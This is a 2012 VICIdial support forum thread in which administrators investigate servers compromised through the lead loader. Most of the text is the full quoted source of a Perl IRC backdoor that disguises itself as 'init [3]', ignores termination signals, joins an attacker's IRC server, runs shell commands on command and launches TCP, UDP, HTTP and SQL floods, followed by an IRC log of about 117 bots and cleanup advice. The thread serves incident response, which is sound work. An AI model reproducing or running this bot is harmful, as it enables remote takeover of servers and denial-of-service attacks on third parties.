      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
 
  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $port = 1; $port <= 65000; $port++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub udpflooder2 {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my $udpport = $_[3];
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
 
  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}
sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");

sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

It got a lot of nice features. use this "PRIVATE-SHIT" as much as you like :D
they are controlling the servers with irc,
I joined the channel and they got a lot of bots in #vici:
22:05:17-!- domedan [domedan@bredband.telia.com] has joined #vici
22:05:17[Users #vici]
22:05:17[@Arz ] [ legend-2114407] [ legend-4141544] [ legend-5216791] [ legend-6564188] [ legend-902578 ]
22:05:17[@legend ] [ legend-2219609] [ legend-4205939] [ legend-5453424] [ legend-6606186] [ legend-9074556 ]
22:05:17[@Zax ] [ legend-2399867] [ legend-4269871] [ legend-5457869] [ legend-6706281] [ legend-9085946 ]
22:05:17[ domedan ] [ legend-2472740] [ legend-4411230] [ legend-5506832] [ legend-6804481] [ legend-9106466 ]
22:05:17[ legend-1053838] [ legend-2532484] [ legend-4463938] [ legend-5613237] [ legend-6939433] [ legend-9121552 ]
22:05:17[ legend-1154062] [ legend-2573772] [ legend-4490485] [ legend-5773081] [ legend-7086824] [ legend-9175657 ]
22:05:17[ legend-119405 ] [ legend-2593175] [ legend-4621717] [ legend-5792627] [ legend-7277080] [ legend-9290305 ]
22:05:17[ legend-1196016] [ legend-2738087] [ legend-4670232] [ legend-5797741] [ legend-7323799] [ legend-9362856 ]
22:05:17[ legend-1228289] [ legend-2763621] [ legend-4690292] [ legend-5811294] [ legend-7411641] [ legend-9532331 ]
22:05:17[ legend-1301620] [ legend-2854885] [ legend-4717048] [ legend-5845477] [ legend-7492307] [ legend-9541299 ]
22:05:17[ legend-1403000] [ legend-3011003] [ legend-4757422] [ legend-59046 ] [ legend-7566805] [ legend-9597850 ]
22:05:17[ legend-1500923] [ legend-3130239] [ legend-4792816] [ legend-5971684] [ legend-7590112] [ legend-9618615 ]
22:05:17[ legend-1551443] [ legend-3284672] [ legend-4810559] [ legend-5987907] [ legend-7596290] [ legend-9719818 ]
22:05:17[ legend-1640994] [ legend-3437207] [ legend-4816366] [ legend-6018961] [ legend-7603667] [ legend-972908-1472135]
22:05:17[ legend-1903723] [ legend-3481315] [ legend-4845444] [ legend-6035015] [ legend-7719432] [ legend-9838014 ]
22:05:17[ legend-1921205] [ legend-3489298] [ legend-4871822] [ legend-6261054] [ legend-7782481] [ legend-9862820 ]
22:05:17[ legend-198544 ] [ legend-3551466] [ legend-493663 ] [ legend-629499 ] [ legend-7946213]
22:05:17[ legend-2028755] [ legend-3901269] [ legend-5029084] [ legend-6337581] [ legend-8092993]
22:05:17[ legend-2041938] [ legend-4093763] [ legend-5037497] [ legend-6339421] [ legend-8603140]
22:05:17[ legend-2064633] [ legend-409732 ] [ legend-509556 ] [ legend-6377342] [ legend-8605492]
22:05:17[ legend-2088615] [ legend-4123099] [ legend-515754 ] [ legend-6394740] [ legend-8885262]
22:05:17-!- Irssi: #vici: Total of 121 nicks [3 ops, 0 halfops, 0 voices, 118 normal]
22:05:17-!- Channel #vici created Wed Jul 25 11:47:52 2012
22:05:17-!- Irssi: Join to #vici was synced in 0 secs
22:06:38[space] -!- #zax Arz H* 0 hacktech@legendteam.info [TheChozen]
22:06:38[space] -!- End of /WHO list
22:06:52[space] -!- #vici legend H 0 vici@72.21.12.168 [legend secrets!]
22:06:52[space] -!- End of /WHO list
22:07:14[space] -!- #perl Zax H* 0 Zax@legendteam.info [Zax]
22:07:14[space] -!- End of /WHO list

117 vicidial-servers probably, not bad...
the holes should be fixed, can you guys who have been hacked post your logs somewhere so we can figure out what vulnerability they are using to get to the listloader
Last edited by DomeDan on Tue Jul 31, 2012 3:34 pm, edited 1 time in total.
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby rrb555 » Tue Jul 31, 2012 3:27 pm

what does this vici.txt do on the server?

the holes should be fixed, can you guys who have been hacked post your logs somewhere so we can figure out what vulnerability they are using to get to the listloader


i am now already updated to the latest revision (on my signature). will be my server safe now? :?
One server that I am managing | Single Server | ViciBox Redux 6.0 | VERSION: 2.12-549a | BUILD: 160404-0940 | revision 2508| No other hardware
For help you can send me a direct email info@support.com.ph
rrb555
 
Posts: 585
Joined: Tue Feb 08, 2011 4:24 pm
Location: Quezon City, Philippines

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Tue Jul 31, 2012 3:40 pm

vici.txt is a perl-script with a backdoor,
its a irc-bot that joins a channel so the author can control your server.

you need to kill the process running "perl vici.txt" and remove the files. check crontab and stuff if it added itself to start automatically

and no you are probably not safe, I still dont know how they get in in the first place
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby rrb555 » Tue Jul 31, 2012 3:55 pm

checked the crontab, and compared it to the other servers that i have. Seems like crontab is clean. i had this problem 2 months ago I think viewtopic.php?f=4&t=25148 but when i upgraded the server and killed the crontab that automates the script my server went fine

you mean controlling the server, do u have any idea whats its limitation? i have changed all web admin passwords. ill be doing the same with root.

any particular command on how to check the "perl vici.text"? am using htop to check all process

seems like theyve got in using the /srv/www/htdocs/vicidial/new_listloader_superL.php that is why i am thinking my server is quite safe now.
One server that I am managing | Single Server | ViciBox Redux 6.0 | VERSION: 2.12-549a | BUILD: 160404-0940 | revision 2508| No other hardware
For help you can send me a direct email info@support.com.ph
rrb555
 
Posts: 585
Joined: Tue Feb 08, 2011 4:24 pm
Location: Quezon City, Philippines

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Tue Jul 31, 2012 4:36 pm

check /etc/cron -directories too

cant find the vici.txt -command, but I'm inside a victims server and looking for clues.
found this files:
XXX:~ # ls -l /tmp/.x/.sh3ll/
total 136
-rw-r--r-- 1 wwwrun www 1064 2012-07-31 17:00 mech.levels
-rw------- 1 wwwrun www 5 2012-07-18 08:11 mech.pid
-rw-r--r-- 1 wwwrun www 207 2012-07-31 17:00 mech.session
-rw-r--r-- 1 wwwrun www 89108 2012-07-31 17:10 pig.seen
-rwx--x--x 1 wwwrun www 15078 2011-02-06 20:04 stealth
-rwxr-xr-x 1 wwwrun www 6204 2012-07-17 23:16 timeout
-rwxr-xr-x 1 wwwrun www 183 2012-07-18 08:11 update
-rwxr-xr-x 1 wwwrun www 81 2012-07-31 17:00 usr


saw two processes using ./stealth
so check with "ps aux | grep stealth"
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby rrb555 » Tue Jul 31, 2012 6:13 pm

seems like i had one running. can i kill this? and get to know where its hiding?

Vicidial:/tmp # ps aux | grep stealth
root 30529 0.0 0.0 2412 472 pts/11 S+ 19:09 0:00 grep stealth

XXX:~ # ls -l /tmp/.x/.sh3ll/
total 136
-rw-r--r-- 1 wwwrun www 1064 2012-07-31 17:00 mech.levels
-rw------- 1 wwwrun www 5 2012-07-18 08:11 mech.pid
-rw-r--r-- 1 wwwrun www 207 2012-07-31 17:00 mech.session
-rw-r--r-- 1 wwwrun www 89108 2012-07-31 17:10 pig.seen
-rwx--x--x 1 wwwrun www 15078 2011-02-06 20:04 stealth
-rwxr-xr-x 1 wwwrun www 6204 2012-07-17 23:16 timeout
-rwxr-xr-x 1 wwwrun www 183 2012-07-18 08:11 update
-rwxr-xr-x 1 wwwrun www 81 2012-07-31 17:00 usr


i had this previously but i already deleted all the files. killed also the crontab
which i found using this
Jul 18 08:22:01 Vicidial /usr/sbin/cron[9674]: (wwwrun) CMD (/tmp/.x/.sh3ll/update >/dev/null 2>&1)


let me know if you find any. thank you for all the help here

update:

seems like my other two servers has one to which i can make some conclusions that its kinda normal?is it?

VICIdial:# ps aux | grep stealth
root 4402 0.0 0.0 2412 468 pts/2 S+ 19:15 0:00 grep stealth

VICIdial: # ps aux | grep stealth
root 5501 0.0 0.0 2412 472 pts/8 S+ 09:14 0:00 grep stealth
One server that I am managing | Single Server | ViciBox Redux 6.0 | VERSION: 2.12-549a | BUILD: 160404-0940 | revision 2508| No other hardware
For help you can send me a direct email info@support.com.ph
rrb555
 
Posts: 585
Joined: Tue Feb 08, 2011 4:24 pm
Location: Quezon City, Philippines

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Wed Aug 01, 2012 4:41 am

Code: Select all
vicidial:# ps aux | grep stealth
root 4402 0.0 0.0 2412 468 pts/2 S+ 19:15 0:00 grep stealth

thats just the process running "grep" so dont mind that one.

the limitations of the bot seams to be:
# !legend @httpflood <host> <time> #
# !legend @clean #
# !legend @visit <webpage> #
# Oldies: #
# !legend @system #
# !legend @portscan <ip> #
# !legend @nmap <ip> <beginport> <endport> #
# !legend @back <ip><port> #
# !legend @sqlflood <host> <time> #
# !legend @udp <host> <packet size> <time> #
# !legend @udp2 <host> <packet size> <time> <port> #


and this is the stealth-binary, seams like a Denial of service -application:
Code: Select all
vicidial:~ # /tmp/.x/.sh3ll/stealth

mihai@fucked.gov:

Vine noaptea ;)

Usage: Distroy <Criminalu> <Port>




Found out that its not fopen() thats being used, its passthru() further down using the $leadfile_name variable
and $leadfile_name is cleared from special chars in third and forth gen listloader, so after a upgrade this exploit cant be used.


but its either vtigercrm or project_auth_entries.txt thats being used to get the admin login in the first place.


experimented a little, checked the processes and killed this one:
Code: Select all
vicidial:~ # ps aux|grep wwwrun
wwwrun   16174 99.8  0.0   9040  5336 ?        R    Jul29 3877:59 init [3]

kill -9 16174

and then this happen in the #vici channel:
Code: Select all
05:11 -!- legend-8471561 [vici@XX.XX.XX.XX] has quit [Client exited]

yeah that killed the bit, and it dont seam to spawn any new bot, will wait and see

on a clean system you should only find this processes I guess:
Code: Select all
vicidial:~ # ps aux|grep wwwrun
wwwrun    7604  0.0  0.3 151328 14020 ?        S    07:30   0:08 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
...



edit:
looking more in the perl-script vici.txt and saw this:
my $hidden = 'init [3]';
$0="$hidden"."\0"x16;;
so yeah, the process init [3] running from user wwwdata is the script.
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby Michael_N » Wed Aug 01, 2012 8:31 am

DomeDan wrote:That one is a bit different. here is the file vici.txt:
Code: Select all
#!/usr/bin/perl
###########################################################
#-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
###########################################################
# Legend Soldier [2012] DO NOT FUCKIN SHARE!        #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Just the same old re-runs...              #
###########################################################
# Added:                    #
# !legend @httpflood <host> <time>           #
# !legend @clean                 #
# !legend @visit <webpage>              #
# Oldies:                    #
# !legend @system                 #
# !legend @portscan <ip>              #
# !legend @nmap <ip> <beginport> <endport>        #
# !legend @back <ip><port>              #
# !legend @sqlflood <host> <time>           #
# !legend @udp <host> <packet size> <time>        #
# !legend @udp2 <host> <packet size> <time> <port>      #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
###########################################################

###########################################################
#      addiCteD tO null!!!           #
###########################################################

####################[Configuration]########################
###########################################################
my $hidden = 'init [3]';
my $linas_max='4';
my $sleep='5';
my @admins=("ARZ","god","Zax");
my @hostauth=("legendteam.info");
my @channels=("#vici");
my $nick='legend';
my $ircname ='vici';
my $realname = 'legend secrets!';
my $server='space.legendteam.info';
my $port='6667';
###########################################################
####################[Configuration]########################
###########################################################
####################[lets start..]#########################
###########################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
use LWP::UserAgent;
chdir("/");
$0="$hidden"."\0"x16;;
my $pid=fork;
exit if $pid;
die "fork problem: $!" unless defined($pid);
###########################################################
####################[lets start..]#########################
###########################################################
####################[Connecting...]########################
###########################################################
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $server_con = $_[1];
   my $port_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
     $irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}
###########################################################
####################[Connecting...]########################
###########################################################
####################[..Connected..]########################
###########################################################
sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION Legend IRC [2010]\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
   }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick-".int rand(9999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $channel (@channels) {
         sendraw("JOIN $channel sexy");
       }
   }
}

###########################################################
####################[..Functions..]########################
###########################################################

sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {

###########################################################
######################[..@system..]########################
###########################################################

         if ($funcarg =~ /^system/) {
            $uname=`uname -a`;
            $uptime=`uptime`;
            $ownd=`pwd`;
            $distro=`cat /etc/issue`;
            $id=`id`;
            $un=`uname -sro`;
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro");
         }

###########################################################
######################[..@system..]########################
###########################################################

###########################################################
######################[.@portscan.]########################
###########################################################

         if ($funcarg =~ /^portscan (.*)/) {
            my $hostip="$1";
            @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
            my (@aberta, %porta_banner);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started .");
            foreach my $porta (@portas)  {
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
                  'tcp', Timeout => 4);
               if ($scansock) {
                  push (@aberta, $porta);
                  $scansock->close;
               }
            }
 
            if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta");
            } else {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend.");
            }
         }

###########################################################
######################[.@portscan.]########################
###########################################################


###########################################################
########################[.@Visit.]#########################
###########################################################

         if ($funcarg =~ /^visit (.*)/) {
  my $url = "$1";
my $ua = LWP::UserAgent->new;
 $ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0');

 $ua->timeout(10);
 $ua->env_proxy;
 
 my $response = $ua->get($url);
 
 if ($response->is_success) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Got Response From $url.");
 }
 else {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Failed Getting Response From $url.");
 }


}


###########################################################
########################[.@Visit.]#########################
###########################################################

###########################################################
######################[.@tcpflood.]########################
###########################################################

           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
 sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds.");
        my $itime = time;
        my ($cur_time);
             $cur_time = time - $itime;
        while ($3>$cur_time){
             $cur_time = time - $itime;
        &tcpflooder("$1","$2","$3");
             }
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2.".");
           }

###########################################################
######################[.@tcpflood.]########################
###########################################################

###########################################################
#####################[.@httpflood.]########################
###########################################################

           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds.");
        my $itime = time;
        my ($cur_time);
             $cur_time = time - $itime;
        while ($2>$cur_time){
             $cur_time = time - $itime;
        my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
        close($socket);
             }
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1.".");
           }
###########################################################
#####################[.@httpflood.]########################
###########################################################

###########################################################
######################[.@sqlflood.]########################
###########################################################

if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
   my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
   print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1.".");
}

###########################################################
######################[.@sqlflood.]########################
###########################################################

###########################################################
######################[.@udpflood.]########################
###########################################################
           if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
           }
###########################################################
######################[.@udpflood.]########################
###########################################################

###########################################################
######################[.@udp2flood.]########################
###########################################################
           if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds.");
             my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
